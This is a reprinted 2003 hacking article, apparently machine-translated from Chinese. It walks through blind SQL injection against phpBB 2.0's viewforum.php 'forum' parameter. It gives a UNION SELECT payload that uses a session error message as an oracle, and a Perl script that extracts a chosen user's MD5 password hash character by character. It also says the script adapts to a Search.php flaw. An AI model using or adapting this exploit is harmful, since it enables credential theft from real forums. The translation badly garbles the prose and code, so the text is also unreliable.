Creation time: 2003-12-08
Article properties: reprint
Article submission:
19821119 (19821119_at_vip.sina.com)
This article is: PinKeyes
It is difficult to see a complete article on PHP injection and use code, so I have repeated mySQL and PHP a few weeks. Let's talk about my tie, I hope I can throw brick!
I believe that everyone's injection of ASP is already very familiar, and the injection of PHP is more difficult than ASP, because PHP's magic_gpc option is really a headache, do not quit quotes in the injection, while PHP is more than MySQL, and MySQL function The shortcomings, from another perspective, it is necessary to prevent SQL NJECTION attacks to a certain extent, I will give an example here, I take PHPBB2.0 as an example:
There is a variable in viewforum.php without filtration:
IF (Isset ($ http_get_vars { $ forum_id = (isset ($ http_get_vars ($ Http_post_vars } ELSE IF ($ http_get_vars ['forum']))) { $ forum_id = $ http_get_vars ['forum']; } Else { $ forum_id = ''; } That is this forum, and put it directly into the query: IF (! EMPTY ($ forum_id)) { $ SQL = "SELECT * ". Forums_table." WHERE forum_id = $ forum_id "; IF (! ($ results = $ db-> sql_query ($ sql))) { Message_die (General_ERROR, 'Could NOT OBTAIN forums Information', '', __LINE__, __File__, $ SQL); } } Else { Message_die (general_message, 'forum_not_exist'); } If it is an ASP, I believe that many people will inject. If this forum_id specified forum does not exist, the $ result will be empty, so return to the could not obtain forums information, so the following code cannot be executed. // // if the query doesn't return any rows this isn't a valid forum. Inform // The user. // IF (! ($ forum_row = $ db-> sql_fetchrow ($ result)))))) { Message_die (general_message, 'forum_not_exist'); } // // start session management // $ userData = session_pagestart ($ user_IP, $ forum_id) / ************************************************** ** The key is the line of the star, here is a function session_pagestart ($ user_ip, $ thispage_id), this is a function defined in session.php, because the code is too long, it is not fully posted, interested can Self-see, the key is that this function also calls session_begin (), the function calls as follows session_begin ($ user_id, $ user_ip, $ thispage_id, true), is also defined in this file, which is the following code $ SQL = "Update". sessions_table. " SET session_user_id = $ user_id, session_start = $ current_time, session_time = $ current_time, session_page = $ Page_ID, session_logged_in = $ login Where session_id = '". $ Session_id."' And session_ip = '$ usr_ip' "; IF (! ($ result = $ dB-> SQL_QUERY ($ SQL)) ││! $ db-> SQL_AffectedRows ()) { $ session_id = md5 (UNIQID ($ USER_IP)); $ SQL = "INSERT INTO". sessions_table. " (session_id, session_user_id, session_start, session_time, session_ip, session_page, Session_logged_in) VALUES ('$ session_id', $ usr_id, $ current_time, $ current_time, '$ user_ip', $ page_id, $ login) IF (! ($ results = $ db-> sql_query ($ sql))) { Message_die (critical_error, 'error create new session: session_begin', '', __LINE__, __File__, $ SQL); } Here, there is a session_page defined in MySQL, his 値 $ page_id, that is, $ forum_id, if inserted is not shaping, it will report an error, it will appear Error Creating new session: Sensions_begin's prompt, so I have to refer to this $ forum_id is important, so I specified it as: -1% 20Union% 20Select% 201, 1, 1, 1, 1, 1, 1, 1 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1% 20From% 20PHPBB_USERS% 20where% 20User_ID = 2% 20and% 20ORD (Substring (user_password, 1, 1)))) = 57, there is no quotation! Although specified is a non-existing Forum_ID but he returns the query result can not be empty, this is the ASCII code value of the first password of the user_id 2 user is 57, If there is a problem in the first paragraph in the article in the article, it is not empty. So the Ession_pagestart has a problem with the problem. Insert is not an integer, it will be wrong, so I will show Error Creating New session: session_begin, Indicates that you guess the first place, other bit is similar. If there is no such error message, I think that even if it is successful, it is difficult to judge whether it has succeeded. It seems that the error message is also very helpful. Analysis is here, here is attached to a test code, this code as long as the code is slightly modified It can be applied to other similar guessing MD5 passwords. Here I use the English version of the return condition, Chinese and other languages as long as the return condition is changed. ISE http :: remove :: Common; Use http :: response; Use lwp :: use of useage; $ ua = new lwp :: useagerth; Print "********************* / N"; Print "PHPBB ViewForum.php Exp / N"; Print "Code by PINKEYES / N"; PRINT " www.icehack.com/n "; Print "*********************** / N"; Print "Please enter the weak file's url: / n"; Print "E.G. http://192.168.1.4/phpbb2/viewforum.php/n "; $ ADR = CHOMP ($ ADR); Print "Please enter the user_id That You Want to CRACK / N"; $ u = Chomp ($ u); Print "Work Starting, please wait! / n"; @pink = (48..57); @pink = (@pink, 97..102); For ($ j = 1; $ j <= 32; $ j ) { For ($ I = 0; $ i <@pink; $ i ) { $ URL = $ ADR. "? Forum = -1% 20Union% 20Select% 201, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 , 1, 1, 1, 1, 1% 20FROM% 20PHPBB_USERS% 20where% 20User_id = $ u% 20and% 20ORD (Substring (user_password, $ j, 1)) = $ PINK [$ I] "; $ request = http :: remove-> new ('get', "$ url"); $ response = $ uA-> Request ($ request); IF ($ response-> is_success) { IF ($ response-> content = ~ / error create new session /) { $ PWD. = CHR ($ PINK [$ I]); PRINT "$ PWD / N"; } } } } IF ($ PWD NE ") { Print "Successfully, The Password IS $ PWD, Good Luck / N"; Else { Print "Bad Luck, Work Failed! / N"; As for the recent PHPBB2.0.6 Search.php problem utilization, only the above code is slightly modified, if you want to be wrong, please Www.icehack.com. Copyright (c) 2001-2003 SafeChina.Net All Rights Reserved
